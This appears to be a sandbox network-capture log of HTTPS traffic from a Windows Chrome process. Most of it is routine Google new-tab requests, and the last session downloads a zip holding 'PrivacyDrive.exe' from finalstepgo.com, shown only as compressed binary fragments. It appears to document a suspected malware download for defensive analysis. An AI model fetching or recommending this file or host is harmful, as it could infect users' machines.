2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 61 4c 69 64 59 56 34 69 34 70 39 2b 47 6d 6a 75 4e 67 64 34 7a 65 4e 6e 46 59 76 6e 44 6c 7a 35 76 79 4a 47 4e 62 43 63 34 6b 42 34 71 4c 56 4d 4c 68 2f 64 56 57 57 79 36 76 37 67 58 55 42 55 4d 4b 71 55 72 7a 30 6e 61 55 41 56 61 70 6c 55 6c 6d 70 56 5a 43 56 64 6c 2f 75 47 50 33 42 62 5a 71 31 6f 30 51 73 66 35 7a 62 71 5a 36 33 68 77 55 74 77 59 56 36 53 53 36 78 69 64 31 32 37 37 58 6a 37 70 4c 36 5a 2b 6f 30 58 34 4f 39 5a 73 46 49 39 6f 71 6c 6d 4b 71 7a 45 39 56 36 53 66 4d 6b 69 61 71 50 78 77 71 35 2f 6c 47 74 54 71 74 44 46 39 66 57 4c 71 71 78 63 79 6d 44 4a 48 71 71 32 45 43 36 56 4d 52 59 39 4e 73 59 6f 59 59 58 46 61 77 34 73 2f 6a 31 44 47 73 52 56 7a 42 34 71 35 5a 4c 65 34 71 71 64 5a 53 35 65 4d 6a 54 4b 71 71 79 56 4f 62 58 70 6d 72 6c Data Ascii: aLidYV4i4p9+GmjuNgd4zeNnFYvnDlz5vyJGNbCc4kB4qLVMLh/dVWWy6v7gXUBUMKqUrz0naUAVaplUlmpVZCVdl/uGP3BbZq1o0Qsf5zbqZ63hwUtwYV6SS6xid1277Xj7pL6Z+o0X4O9ZsFI9oqlmKqzE9V6SfMkiaqPxwq5/lGtTqtDF9fWLqqxcymDJHqq2EC6VMRY9NsYoYYXFaw4s/j1DGsRVzB4q5ZLe4qqdZS5eMjTKqqyVObXpmrl
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 6c 4e 4c 70 2f 4a 34 57 73 57 42 79 73 68 6d 63 31 7a 55 39 51 78 76 31 75 6e 66 50 68 66 49 63 48 4f 77 6f 73 55 76 6d 70 6b 45 39 73 59 43 47 69 58 56 4a 4d 56 45 79 61 37 58 4b 57 31 4a 74 34 7a 33 74 31 6e 38 31 68 73 4e 47 72 36 35 72 50 48 41 4f 78 57 33 33 76 63 7a 73 30 56 2f 74 51 6b 48 6b 49 61 79 67 6f 61 38 56 57 69 62 43 61 6d 56 5a 71 66 47 72 71 42 6d 70 79 41 2b 73 67 71 72 55 59 53 32 42 30 74 32 4b 35 78 6c 4a 78 68 63 57 50 63 6c 70 46 57 37 45 63 48 6c 36 66 53 43 64 50 6a 69 59 53 70 45 56 68 72 59 57 63 56 6f 64 48 78 37 45 54 57 66 31 4c 71 79 57 71 53 69 72 56 35 75 62 6d 46 35 74 62 59 6a 47 58 37 68 49 50 50 4a 43 48 53 2b 36 57 58 44 53 47 35 5a 48 4b 5a 39 57 7a 4c 64 5a 48 68 70 58 5a 72 76 78 63 31 70 5a 4a 77 75 59 6d 6d 38 Data Ascii: lNLp/J4WsWByshmc1zU9Qxv1unfPhfIcHOwosUvmpkE9sYCGiXVJMVEya7XKW1Jt4z3t1n81hsNGr65rPHAOxW33vczs0V/tQkHkIaygoa8VWibCamVZqfGrqBmpyA+sgqrUYS2B0t2K5xlJxhcWPclpFW7EcHl6fSCdPjiYSpEVhrYWcVodHx7ETWf1LqyWqSirV5ubmF5tbYjGX7hIPPJCHS+6WXDSG5ZHKZ9WzLdZHhpXZrvxc1pZJwuYmm8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.17	49719	142.250.185.132	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:23 UTC	538	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCNy9zQEIkcrNAQi5ys0BCLbLzQEI6dLNAQiK080BCMHUzQEIz9bNAQjj1s0BCI7XzQEIp9jNAQi62M0BCPnA1BUYuL/NARj2yc0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:41:23 UTC	1042	IN	HTTP/1.1 200 OK Version: 677663421 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 26 Sep 2024 15:41:23 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:41:23 UTC	348	IN	Data Raw: 32 31 34 32 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 33 64 20 67 62 5f 52 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2142)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_3d gb_Re gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 Data Ascii: gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 2
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 Data Ascii: u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u0
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 Data Ascii: "0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 Data Ascii: -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 36 2c 33 37 30 31 33 38 31 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b Data Ascii: enu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700306,3701381,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};
2024-09-26 15:41:23 UTC	1224	IN	Data Raw: 54 79 70 65 73 3b 5f 2e 5a 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 5a 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 57 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 59 67 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 5b 58 64 28 5c 22 64 61 74 61 5c 22 29 2c 58 64 28 5c 22 68 74 74 70 5c 22 29 2c 58 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 58 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 58 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 Data Ascii: Types;_.Zd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.$d\u003dnew _.Zd(\"about:invalid#zClosurez\");_.Wd\u003dclass{constructor(a){this.Yg\u003da}};_.ae\u003d[Xd(\"data\"),Xd(\"http\"),Xd(\"https\"),Xd(\"mailto\"),Xd(\"ftp\"),new
2024-09-26 15:41:23 UTC	391	IN	Data Raw: 31 38 30 0d 0a 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 5a 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 5a 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 6e 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6c 65 74 20 63 2c 64 3b 72 65 74 75 72 6e 28 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 62 2e 64 6f 63 75 6d 65 6e 74 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e Data Ascii: 180e.test(a))return a};_.oe\u003dfunction(a){if(a instanceof _.Zd)if(a instanceof _.Zd)a\u003da.i;else throw Error(\"F\");else a\u003d_.ne(a);return a};_.pe\u003dfunction(a,b){let c,d;return(b\u003d(d\u003d(c\u003db.document).querySelector)\u003d\u003dn
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 72 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 41 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 65 65 28 5f 2e 59 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 64 65 28 5f Data Ascii: 8000\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.re\u003dfunction(a,b,c){return _.Ab(a,b,c,!1)!\u003d\u003dvoid 0};_.se\u003dfunction(a,b){return _.ee(_.Yc(a,b))};_.S\u003dfunction(a,b){return _.de(_
2024-09-26 15:41:23 UTC	1390	IN	Data Raw: 2b 29 7b 76 61 72 20 67 5c 75 30 30 33 64 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 74 79 70 65 6f 66 20 67 2e 73 70 6c 69 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 76 61 28 67 2e 73 70 6c 69 74 28 2f 5c 5c 73 2b 2f 29 2c 62 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 66 5b 64 2b 2b 5d 5c 75 30 30 33 64 61 29 7d 66 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 64 3b 72 65 74 75 72 6e 20 66 7d 72 65 74 75 72 6e 20 65 7d 3b 5c 6e 5f 2e 43 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 46 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a Data Ascii: +){var g\u003da.className;typeof g.split\u003d\u003d\"function\"\u0026\u0026_.va(g.split(/\\s+/),b)\u0026\u0026(f[d++]\u003da)}f.length\u003dd;return f}return e};\n_.Ce\u003dfunction(a,b){_.Fb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.17	49720	142.250.185.132	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:23 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:41:23 UTC	957	IN	HTTP/1.1 200 OK Version: 677663421 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 26 Sep 2024 15:41:23 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-26 15:41:23 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-09-26 15:41:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.17	49722	185.255.122.133	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:24 UTC	675	OUT	GET /uploads/il222.zip HTTP/1.1 Host: finalstepgo.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:41:25 UTC	215	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:41:18 GMT Server: Apache Last-Modified: Thu, 26 Sep 2024 14:09:59 GMT Accept-Ranges: bytes Content-Length: 1527814 Connection: close Content-Type: application/zip
2024-09-26 15:41:25 UTC	7977	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 63 35 3a 59 4e 2b 47 29 60 4f 17 00 88 f8 2b 00 10 00 00 00 50 72 69 76 61 63 79 44 72 69 76 65 2e 65 78 65 ec 7d 7f 5c 54 45 f7 f0 dd 65 81 05 57 76 51 50 4a 54 d4 b5 2c d4 30 b4 34 34 41 5d 44 03 dd 15 59 f0 17 98 19 6e ab 25 e1 ae 62 8a 4a cb a2 b7 f1 a2 8f 69 a9 99 61 da 53 8f 59 69 9a a2 a9 a1 18 8b 4a 0a 66 66 69 6a 3e 56 97 c0 c2 34 45 43 ef 3b 67 e6 de fd 01 8b d0 f3 fd 3e ef e7 fd e3 b5 4f dc b9 73 cf cc 9c 39 73 ce 99 33 67 ce cc 26 4d 5c c9 f8 30 0c a3 c0 ff 0b 02 c3 14 33 f4 5f 2c d3 f2 bf 08 19 c3 04 75 dd 17 c4 ec 0a f8 aa 5b b1 2c f1 ab 6e e3 4d 2f cc 89 c8 ca 9e 3d 23 fb d9 17 23 9e 7b f6 a5 97 66 5b 22 a6 3d 1f 91 6d 7d 29 e2 85 97 22 46 8c 4d 8e 78 71 f6 f4 e7 fb b6 6d 1b a8 15 eb 98 b1 d1 3e a1 87 50 13 28 Data Ascii: PKc5:YN+G)`O+PrivacyDrive.exe}\TEeWvQPJT,044A]DYn%bJiaSYiJffij>V4EC;g>Os9s3g&M\03_,u[,nM/=##{f["=m})"FMxqm>P(
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: 1f af f0 89 e7 de 60 85 fb 7c 72 cb 35 64 86 e2 5d 10 73 d5 6f ae 14 73 75 84 cd d7 6e c7 59 ee 53 4b be b6 1c e7 48 b3 0b 46 21 5f bb 8b ca 24 83 93 c5 9e 49 7f 9a 94 00 32 71 7d 70 46 02 3f 2a 23 c8 63 03 7d 2b a2 70 45 62 11 f1 03 80 83 fd 5a 46 c1 65 68 05 68 37 88 d4 ce 3b 44 26 d9 f9 64 92 0d 80 b0 40 8e 82 ea b9 d5 da 0f 40 32 06 6f a7 81 5a fb 69 e3 d6 8e 18 60 3f 58 12 34 0e 8b 9b 46 43 b5 fa a1 a5 2a bf 66 e6 6d e8 6b 89 ab 48 bb 7d 52 e8 d6 08 6d 18 f8 7b d8 2b 98 ac fe 70 14 f1 24 96 97 90 34 a2 96 06 e3 16 a1 22 f0 de 84 89 6d e2 64 94 88 9f 7a 38 7d c2 84 8d eb 09 d1 83 a4 91 98 2d 2c 68 24 62 0b cf b6 7a fa 1e 25 a3 92 38 58 9c b0 63 c5 e7 f8 85 f4 7b a2 67 94 96 85 0a 4f be 36 df 35 06 cb 3c 93 40 5b 37 00 90 6e 8b 48 5c 39 ae 30 0b 16 23 Data Ascii: `\|r5d]sosunYSKHF!_$I2q}pF?#c}+pEbZFehh7;D&d@@2oZi`?X4FCfmkH}Rm{+p$4"mdz8}-,h$bz%8Xc{gO65<@[7nH\90#
2024-09-26 15:41:25 UTC	8000	IN	Data Raw: 1a be c0 84 9c f3 74 4b fb d5 7f 6d 6a c5 7e 4a ec 09 a3 cb bc 53 62 15 57 d4 2d c5 39 e9 87 48 6d 78 d9 43 6c da 5e e4 bb 2d c5 a7 ba 37 16 27 35 e6 65 4a 22 e3 1d 82 bb ab 4e 2d 49 fd 43 1d ac ab e5 16 29 53 e9 5d bd 7f a8 35 f1 11 99 ea c7 7c 97 64 a5 31 73 cd 9c ae 16 d7 93 00 97 44 e8 6e e0 d4 08 38 dd 9f 52 8f 2b e5 75 7f b5 c3 c9 3a 94 54 0b 55 dc e0 07 e0 77 db a2 81 50 43 d2 8d 3f d4 e9 e5 7f a8 27 b4 5d f9 72 1a 93 a9 ee 75 e8 0f f5 e4 f8 08 4b 00 7e 8c e9 85 ff 90 f7 28 0c e0 cb e3 66 08 0a a9 f4 62 60 5c 5a 57 9b e1 ed be f1 b4 77 5b a4 37 3f 67 8e 6b bb 5f 07 47 bc 31 cf 39 fc 12 30 5d f0 f8 37 67 8f 35 89 e7 44 71 2a 17 73 fc 9d f6 c5 16 f8 bb d9 6a e7 20 3f 36 b8 c5 41 a6 f5 2f 6b 69 7c c5 ca 8b b2 d5 cd d8 19 9e f5 6d 7f d7 cd 5e 0c 6f 26 Data Ascii: tKmj~JSbW-9HmxCl^-7'5eJ"N-IC)S]5\|d1sDn8R+u:TUwPC?']ruK~(fb`\ZWw[7?gk_G190]7g5Dq*sj ?6A/ki\|m^o&
